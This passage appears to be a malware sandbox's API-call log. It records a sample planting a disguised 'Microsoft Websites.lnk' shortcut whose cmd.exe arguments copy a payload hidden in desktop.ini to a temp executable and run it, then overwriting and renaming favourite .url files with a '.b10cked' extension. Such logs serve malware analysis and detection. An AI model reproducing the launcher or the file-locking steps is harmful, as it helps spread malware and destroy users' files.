Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0213.366] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0213.366] 
ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0213.366] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0213.367] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Microsoft Websites\" & type \"Microsoft Websites\\desktop.ini\" > \"%TEMP%\\CECoIF7G.exe\" && \"%TEMP%\\CECoIF7G.exe\"") returned 0x0 [0213.367] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0213.367] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0213.368] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0213.368] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites.lnk", fRemember=0) returned 0x0 [0213.374] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0213.374] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0213.374] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0213.374] CoUninitialize () [0213.375] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.375] ReleaseMutex (hMutex=0xf8) returned 1 [0213.375] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.375] ReleaseMutex (hMutex=0xf8) returned 1 [0213.375] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.375] ReleaseMutex (hMutex=0xf8) returned 1 [0213.375] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.375] ReleaseMutex (hMutex=0xf8) returned 1 [0213.375] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: 
"c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.407] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27019634025) returned 1 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 
| out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.408] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.409] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.409] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.409] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.410] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.410] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.410] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.410] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.410] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) 
returned 0x44 [0213.410] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE site on Microsoft.com.url", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0213.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE site on Microsoft.com.url", cchWideChar=28, lpMultiByteStr=0x132f75c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IE site on Microsoft.com.url", lpUsedDefaultChar=0x0) returned 28 [0213.414] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0213.414] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0213.415] CloseHandle (hObject=0x120) returned 1 [0213.415] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL") returned 0x2f [0213.416] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0213.416] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on 
Microsoft.com.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9d4, dwThreadId=0x9dc)) returned 1 [0213.418] CloseHandle (hObject=0x1b4) returned 1 [0213.418] CloseHandle (hObject=0x120) returned 1 [0213.418] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.418] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.418] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount1=46, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount2=46) returned 2 [0213.418] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.418] ReleaseMutex (hMutex=0xf8) returned 1 [0213.418] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.418] ReleaseMutex (hMutex=0xf8) returned 1 [0213.418] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.418] ReleaseMutex (hMutex=0xf8) returned 1 [0213.418] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 
[0213.418] ReleaseMutex (hMutex=0xf8) returned 1 [0213.418] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.419] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27020842641) returned 1 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | 
out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.419] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.420] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0213.421] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.421] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0213.421] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.421] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0213.421] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.421] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.421] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.422] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.422] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.422] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.422] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 
1 [0213.422] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.422] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Home.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0213.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Home.url", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft At Home.url", lpUsedDefaultChar=0x0) returned 21 [0213.426] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0213.426] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0213.426] CloseHandle (hObject=0x120) returned 1 [0213.427] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL") returned 0x2f [0213.427] GetShortPathNameW (in: 